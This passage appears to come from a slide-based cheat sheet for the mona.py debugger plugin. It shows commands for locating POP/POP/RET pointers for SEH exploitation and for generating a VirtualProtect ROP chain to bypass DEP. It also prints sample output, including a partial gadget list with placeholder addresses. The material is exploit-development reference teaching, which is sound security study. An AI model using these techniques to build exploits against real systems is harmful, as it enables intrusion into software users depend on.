"nop" Return the opcode of specified instructions (chain with '#'). ************************************************************************ *** Searching for 'POP/POP/RET' instruction (SEH exploiting) *********** ************************************************************************ !mona seh Find POP POP RET instruction into program memory. This statements could be used in SEH exploiting. --- output --- 0BADF00D [+] Writing results to C:mona_logsseh.txt 0BADF00D - Number of pointers of type 'pop ebx # pop eax # ret ' : 3 0BADF00D - Number of pointers of type 'pop esi # pop edi # ret ' : 3 0BADF00D - Number of pointers of type 'pop ecx # pop ebx # ret ' : 1 0BADF00D - Number of pointers of type 'pop ebx # pop ebp # ret ' : 3 0BADF00D - Number of pointers of type 'pop ebx # pop eax # ret 04' : 2 0BADF00D - Number of pointers of type 'pop ebx # pop ecx # ret ' : 15 0BADF00D - Number of pointers of type 'pop ecx # pop edi # ret ' : 1 0BADF00D - Number of pointers of type 'pop ebx # pop ecx # ret 0c' : 1 0BADF00D - Number of pointers of type 'pop esi # pop ebx # ret ' : 6 0BADF00D - Number of pointers of type 'jmp dword ptr ss:[esp+14]' : 1 0BADF00D - Number of pointers of type 'pop esi # pop ebx # ret 08' : 2
  • 4. 0BADF00D - Number of pointers of type 'call dword ptr ss:[ebp-04]' : 1 0BADF00D - Number of pointers of type 'pop esi # pop ebx # ret 04' : 2 0BADF00D - Number of pointers of type 'call dword ptr ss:[esp+14]' : 1 0BADF00D - Number of pointers of type 'pop ebx # pop ecx # ret 04' : 14 0BADF00D - Number of pointers of type 'call dword ptr ss:[ebp-18]' : 1 0BADF00D - Number of pointers of type 'pop edi # pop ebx # ret ' : 1 [..] --- end of output --- ************************************************************************ *** ROP based exploit ******************************* ************************************************************************ !mona rop -m <NONASLRMODULES> Analyze memory prepare several lists of ROP valid gadget (any INSTR + RET sequence), stack pivots, rop functions, Generate a ROP chain aimed to bypass DEP (call to VirtualProtect with PUSHAD technique), and suggest wich address need to be fixed for make it works. NOTE: Watch "C:mona_logsrop_suggestion.txt" for a clear gadget list. Watch "C:mona_logsrop_virtualprotect.txt" for a starting point for your rop payload (aimed to DEP bypass). Watch "C:mona_logsstack_pivot.txt" for a list of gadget that permit to change ESP. --- output --- ---------- Mona command started on 2011-07-21 10:58:09 ---------- [..] VirtualProtect register structure (PUSHAD technique) ---------------------------------------------------- EAX = NOP (0x90909090) ECX = lpOldProtect (Writable ptr) EDX = NewProtect (0x40) EBX = Size ESP = lPAddress (automatic) EBP = ReturnTo (ptr to jmp esp - run '!mona jmp -r esp - n -o') ESI = ptr to VirtualProtect() EDI = ROP NOP (RETN) VirtualProtect() 'pushad' rop chain ------------------------------------ rop_gadgets = [ 0x00404880, # POP ECX # RETN (server.exe) 0x????????, # <- *&VirtualProtect() 0x00406a48, # MOV EAX,DWORD PTR DS:[ECX] # ADD EAX,ECX # RETN (server.exe) 0x????????, # ** <- find routine to move virtualprotect() into esi # ** Hint : look for mov [esp+offset],eax and pop esi 0x????????, # couldn't find a pointer to put ptr to 'jmp esp' into ebp 0x????????, # <- put pointer to payload here
  • 5. 0x00403e04, # POP EBX # RETN (server.exe) 0x00000201, # <- change size to mark as executable if needed (-> ebx) 0x00404880, # POP ECX # RETN (server.exe) 0x00409000, # RW pointer (lpOldProtect) (-> ecx) 0x00404be4, # POP EDI # RETN (server.exe) 0x00404be5, # ROP NOP (-> edi) 0x0040431c, # POP EDX # RETN (server.exe) 0x00000040, # newProtect (0x40) (-> edx) 0x00404a84, # POP EAX # RETN (server.exe) 0x90909090, # NOPS (-> eax) 0x004022e0, # PUSHAD # RETN (server.exe) # rop chain generated by mona.py # note : this chain may not work out of the box # you may have to change order or fix some gadgets, # but it should give you a head start ].pack("V*") [..] --- end of output --- =================================================================================== === Reference: https://www.corelan.be/index.php/2011/07/14/mona-py-the-manual/ https://www.corelan.be/index.php/2011/05/12/hack-notes-ropping-eggs-for- breakfast/